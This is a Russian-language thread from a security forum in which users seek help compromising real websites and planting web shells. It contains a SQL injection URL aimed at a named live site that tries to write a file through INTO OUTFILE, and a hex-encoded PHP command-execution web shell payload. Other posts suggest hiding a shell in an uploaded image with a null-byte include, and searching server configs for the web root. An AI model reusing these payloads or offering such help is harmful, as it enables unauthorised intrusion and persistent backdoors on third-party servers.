HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #20221  
Старый 28.03.2012, 14:08
Ereee
Guest
Сообщений: n/a
Провел на форуме:
102354

Репутация: 267
По умолчанию

Цитата:
Сообщение от nikaw87  
nikaw87 said:
Вопрос такой... Имеется файл который отвечает за вывод картинки, /resize.php?act=gif&image=../../ххх/хх/34.png , из него что то дельное можно выжать? или бесполезно? таким образом только картинки вытягивает...
Название скрипта подозрительное. Думаю кроме раскрытия путей ничего не получишь.

OxoTnik,

я не думаю, что картинки инклудят.
 
Ответить с цитированием

  #20222  
Старый 28.03.2012, 14:13
nikaw87
Guest
Сообщений: n/a
Провел на форуме:
1172

Репутация: 0
По умолчанию

Цитата:
Сообщение от OxoTnik  
OxoTnik said:
Заливаешь картинку с шелом, и таким же образом вытягиваешь, если чё нул байт
Заливал... также тянул-просто черное изображение( жаль...
 
Ответить с цитированием

  #20223  
Старый 28.03.2012, 14:20
nikaw87
Guest
Сообщений: n/a
Провел на форуме:
1172

Репутация: 0
По умолчанию

Говорю же- только картинки... пробовал достать банально robots.txt, ноль эффекта... решил спросить, может обходные пути есть
 
Ответить с цитированием

  #20224  
Старый 28.03.2012, 18:28
Facecontrol
Guest
Сообщений: n/a
Провел на форуме:
13805

Репутация: 0
По умолчанию

Помогите залить шелл,пробовал так,не получаутся

http://www.hsplusdesign.be/itemviewer.php?id=-39+UNION+SELECT+1,2,3,'',5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21+from+mysql.user+into+outfile+ '/var/www/html/PHPscripts/a.html'--
 
Ответить с цитированием

  #20225  
Старый 28.03.2012, 18:48
Cennarios
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497

Репутация: 303
Отправить сообщение для Cennarios с помощью ICQ
По умолчанию

Цитата:
Сообщение от Facecontrol  
Facecontrol said:
Помогите залить шелл,пробовал так,не получаутся
http://www.hsplusdesign.be/itemviewer.php?id=-39+UNION+SELECT+1,2,3,'',5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21+from+mysql.user+into+outfile+ '/var/www/html/PHPscripts/a.html'--
А так и не получится. Ибо или magic_quotes On либо слеширование вида use near '\'test\',5,6,7. Как минимум ищите скрипты где не происходит слеширование (используются не GPC массивы и тп) и поиск phpmyadmin

PS. Прежде чем делать что-либо , потрудитесь изучить теорию хотябы в минимуме. Изза слеширования вставляются доп символы в sql запрос и он становится некорректным
 
Ответить с цитированием

  #20226  
Старый 28.03.2012, 20:01
Faaax
Guest
Сообщений: n/a
Провел на форуме:
124363

Репутация: 11
По умолчанию

попробуй перевести в HEX

получится так

Код:
Code:
0x3c3f2073797374656d28245f4745545b636d645d293b203f3e
хотя не получится
 
Ответить с цитированием

  #20227  
Старый 28.03.2012, 20:58
GaMeSTeR
Guest
Сообщений: n/a
Провел на форуме:
0

Репутация: 0
По умолчанию

Помогите залить шелл, есть все права, но не могу найти путь до корня сайта, пробовал найти в конфигах /etc/apache2/sites-available/(здесь не могу подобрать имя конфига)

В ошибке естественно путь тоже не проскакивает. Уже 3 часа угробил на этот сайт. Где ещё можно поискать?
 
Ответить с цитированием

  #20228  
Старый 28.03.2012, 21:08
Faaax
Guest
Сообщений: n/a
Провел на форуме:
124363

Репутация: 11
По умолчанию

здесь экстрасенсов нету,сылку в студию
 
Ответить с цитированием

  #20229  
Старый 28.03.2012, 21:14
Facecontrol
Guest
Сообщений: n/a
Провел на форуме:
13805

Репутация: 0
По умолчанию

А можно ли через файл.css залить шелл?
 
Ответить с цитированием

  #20230  
Старый 28.03.2012, 21:17
d1v
Новичок
Регистрация: 21.02.2009
Сообщений: 3
Провел на форуме:
58401

Репутация: 0
По умолчанию

Цитата:
Сообщение от Facecontrol  
Facecontrol said:
А можно ли через файл.css залить шелл?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ